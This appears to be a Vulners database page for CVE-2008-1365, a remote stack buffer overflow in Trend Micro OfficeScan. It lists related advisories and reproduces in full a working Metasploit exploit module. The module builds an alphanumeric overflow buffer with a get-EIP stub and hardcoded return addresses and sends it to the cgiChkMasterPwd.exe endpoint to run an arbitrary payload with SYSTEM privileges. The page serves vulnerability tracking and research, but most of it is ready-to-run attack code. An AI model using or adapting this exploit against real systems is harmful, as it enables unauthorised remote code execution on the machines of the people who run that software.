Vulners
Lucene search
Trend Micro OfficeScan Remote Stack Buffer Overflow
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2008-1365 | 9 May 201000:00 | – | circl |
 | Trend Micro OfficeScan CGI Password Decryption Buffer Overflow (CVE-2008-1365) | 25 Nov 200900:00 | – | checkpoint_advisories |
 | CVE-2008-1365 | 17 Mar 200822:00 | – | cve |
 | CVE-2008-1365 | 17 Mar 200822:00 | – | cvelist |
 | Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit) | 9 May 201000:00 | – | exploitdb |
 | KLA10370 DoS vulnerability in OfficeScan | 17 Mar 200800:00 | – | kaspersky |
 | CVE-2008-1365 | 17 Mar 200822:44 | – | nvd |
 | Trend Micro OfficeScan Remote Stack Overflow | 26 Nov 200900:00 | – | packetstorm |
 | Stack overflow | 17 Mar 200822:44 | – | prion |
 | Trend Micro OfficeScan Policy Server CGI buffer overflow | 3 Mar 200800:00 | – | saint |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasm'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro OfficeScan Remote Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Trend Micro OfficeScan
cgiChkMasterPwd.exe (running with SYSTEM privileges).
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2008-1365' ],
[ 'OSVDB', '42499' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'MinNops' => 0,
'MaxNops' => 0,
#'Space' => 498,
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
# clean up to prevent crash on exit
'Prepend' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov dword ptr fs:[0], 0").encode_string,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# return addresses need to be alphanumeric (here in loadhttp data section)
[ 'Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)', { 'Rets' => [0x63613035, 0x63613032] } ],
],
'DisclosureDate' => '2007-06-28',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
])
end
def exploit
geip_src = "
push esi
push esp
pop eax
xor esi, [eax]
push esi
pop eax
xor eax, got_eip
push eax
pop ecx
got_eip:
"
sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, geip_src)
sc.base_addr = target['Rets'][0]
get_eip = sc.encode_string
pat = Rex::Text.rand_text_alphanumeric(1016)
pat[0, get_eip.length] = get_eip
pat[14, payload.encoded.length] = payload.encoded
pat[512, 4] = [target['Rets'][1]].pack('V') # string pointer (to prevent a crash)
pat[524, 4] = [target['Rets'][0]].pack('V') # sets EIP to the address where the shellcode has been copied
pat[540, 4] = [target['Rets'][0]-1].pack('V') # shellcode will be copied at this address (+1)
data = "TMlogonEncrypted=!CRYPT!" + pat
len = sprintf("%u", data.length);
print_status("Trying target address 0x%.8x..." % target['Rets'][0])
res = send_request_cgi({
'uri' => '/officescan/console/cgi/cgiChkMasterPwd.exe',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'data' => data,
}, 5)
handler
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26.4
EPSS0.75208